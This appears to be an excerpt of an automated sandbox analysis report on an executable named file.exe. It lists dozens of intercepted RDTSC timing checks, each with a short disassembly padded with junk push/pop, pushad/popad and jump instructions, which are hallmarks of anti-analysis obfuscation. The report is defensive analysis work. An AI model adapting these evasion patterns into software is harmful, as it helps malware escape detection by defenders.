                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D183 second address: 75D19D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD0F8E1A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD0F8E1A7ACh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75FE67 second address: 75FE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75FE6B second address: 75FEA0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD0F8E1A7B7h 0x0000000d popad 0x0000000e push ebx 0x0000000f push edi 0x00000010 jmp 00007FD0F8E1A7B1h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762269 second address: 762270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763DF6 second address: 763E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FD0F8E1A7A6h 0x0000000a jo 00007FD0F8E1A7A6h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763E06 second address: 763E23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763E23 second address: 763E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765455 second address: 765459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7699CD second address: 7699DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD0F8E1A7A6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7699DF second address: 7699EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7699EA second address: 769A0D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FD0F8E1A7B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76B346 second address: 76B351 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76F929 second address: 76F958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jnp 00007FD0F8E1A7A6h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FD0F8E1A7B6h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76F958 second address: 76F95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76F95E second address: 76F96F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ADh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720A61 second address: 720A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720A65 second address: 720AA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnp 00007FD0F8E1A7A6h 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 jp 00007FD0F8E1A7AEh 0x00000016 nop 0x00000017 add dword ptr [ebp+122D17D3h], ebx 0x0000001d mov ebx, dword ptr [ebp+12494C9Eh] 0x00000023 adc ecx, 6E309C2Ah 0x00000029 add eax, ebx 0x0000002b sbb di, 95FFh 0x00000030 push eax 0x00000031 js 00007FD0F8E1A7B8h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720AA8 second address: 720AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 770995 second address: 77099B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7749EC second address: 7749F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7749F9 second address: 774A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD0F8E1A7A6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 774A06 second address: 774A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FD0F8CDABE6h 0x00000009 jmp 00007FD0F8CDABF1h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 774A27 second address: 774A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773FAD second address: 773FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773FB1 second address: 773FC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 774511 second address: 77452E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD0F8CDABF5h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77452E second address: 774578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a js 00007FD0F8E1A7A6h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FD0F8E1A7B2h 0x00000017 jmp 00007FD0F8E1A7B2h 0x0000001c popad 0x0000001d jmp 00007FD0F8E1A7B3h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CC99 second address: 77CCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0F8CDABEFh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CCAF second address: 77CCC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7AFh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BB59 second address: 77BB70 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD0F8CDABE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jbe 00007FD0F8CDABE6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BE2C second address: 77BE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BE30 second address: 77BE3F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007FD0F8CDABE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BE3F second address: 77BE5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD0F8E1A7A6h 0x0000000a jng 00007FD0F8E1A7A6h 0x00000010 jmp 00007FD0F8E1A7ADh 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BE5D second address: 77BE99 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD0F8CDABF2h 0x00000008 jmp 00007FD0F8CDABECh 0x0000000d jne 00007FD0F8CDABEEh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 jmp 00007FD0F8CDABEDh 0x0000001b push eax 0x0000001c push edx 0x0000001d jnp 00007FD0F8CDABE6h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BE99 second address: 77BE9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77C6E0 second address: 77C6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77C6EA second address: 77C711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jns 00007FD0F8E1A7A6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007FD0F8E1A7B5h 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781600 second address: 781605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785368 second address: 785379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007FD0F8E1A7A6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785379 second address: 785392 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD0F8CDABE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8CDABEBh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785392 second address: 785396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784612 second address: 78461C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78461C second address: 78463A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 jmp 00007FD0F8E1A7B4h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78463A second address: 78463F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784A47 second address: 784A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FD0F8E1A7A8h 0x0000000e pushad 0x0000000f popad 0x00000010 ja 00007FD0F8E1A7B1h 0x00000016 jmp 00007FD0F8E1A7ABh 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784C26 second address: 784C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jno 00007FD0F8CDABE6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 je 00007FD0F8CDABEEh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784F5A second address: 784F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 jmp 00007FD0F8E1A7AAh 0x0000000b pop esi 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784F6B second address: 784F71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784F71 second address: 784F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CA54 second address: 78CA5E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD0F8CDABE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DD1B second address: 78DD21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DD21 second address: 78DD43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FD0F8CDABE6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E4A7 second address: 78E4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E4AC second address: 78E4D1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD0F8CDABECh 0x00000008 push ecx 0x00000009 jmp 00007FD0F8CDABF4h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C412 second address: 78C418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C418 second address: 78C41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C41E second address: 78C422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C422 second address: 78C428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793E74 second address: 793E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793E78 second address: 793E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0F8CDABEEh 0x00000010 je 00007FD0F8CDABE6h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793E9F second address: 793EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793EA3 second address: 793EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9952 second address: 6D996D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FD0F8E1A7A6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A0ED6 second address: 7A0F09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD0F8CDABEEh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 jmp 00007FD0F8CDABF8h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A0F09 second address: 7A0F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD0F8E1A7A6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2CD5 second address: 7A2CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2B6B second address: 7A2B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2B71 second address: 7A2B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD0F8CDABE6h 0x0000000a jmp 00007FD0F8CDABEFh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C8851 second address: 6C8857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6E6C second address: 7B6E8B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnc 00007FD0F8CDABE6h 0x00000009 pop edx 0x0000000a jmp 00007FD0F8CDABEAh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007FD0F8CDABE6h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6E8B second address: 7B6EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD0F8E1A7AAh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6EA1 second address: 7B6EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6EA5 second address: 7B6EB2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD0F8E1A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6EB2 second address: 7B6EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D104F second address: 6D1055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D1055 second address: 6D105C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D105C second address: 6D1076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B6h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6C96 second address: 7B6CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 jmp 00007FD0F8CDABF0h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6CAD second address: 7B6CD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0F8E1A7AFh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6CD4 second address: 7B6CDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF0DF second address: 7BF0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD8E6 second address: 7BD91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD0F8CDABE6h 0x0000000a jmp 00007FD0F8CDABF4h 0x0000000f popad 0x00000010 jmp 00007FD0F8CDABF9h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BD91E second address: 7BD93D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD0F8E1A7B3h 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BDD56 second address: 7BDD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1EF3 second address: 7C1EF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4FB6 second address: 7D4FC0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4FC0 second address: 7D4FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4FC4 second address: 7D5022 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF3h 0x00000007 jl 00007FD0F8CDABE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jmp 00007FD0F8CDABEFh 0x00000015 jg 00007FD0F8CDABE6h 0x0000001b pop ebx 0x0000001c popad 0x0000001d pushad 0x0000001e pushad 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 push edx 0x00000022 pop edx 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 jmp 00007FD0F8CDABF1h 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 pushad 0x00000032 jne 00007FD0F8CDABE6h 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4E29 second address: 7D4E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CD49F second address: 7CD4A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CD4A3 second address: 7CD4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CD4AF second address: 7CD4B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CD4B3 second address: 7CD4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
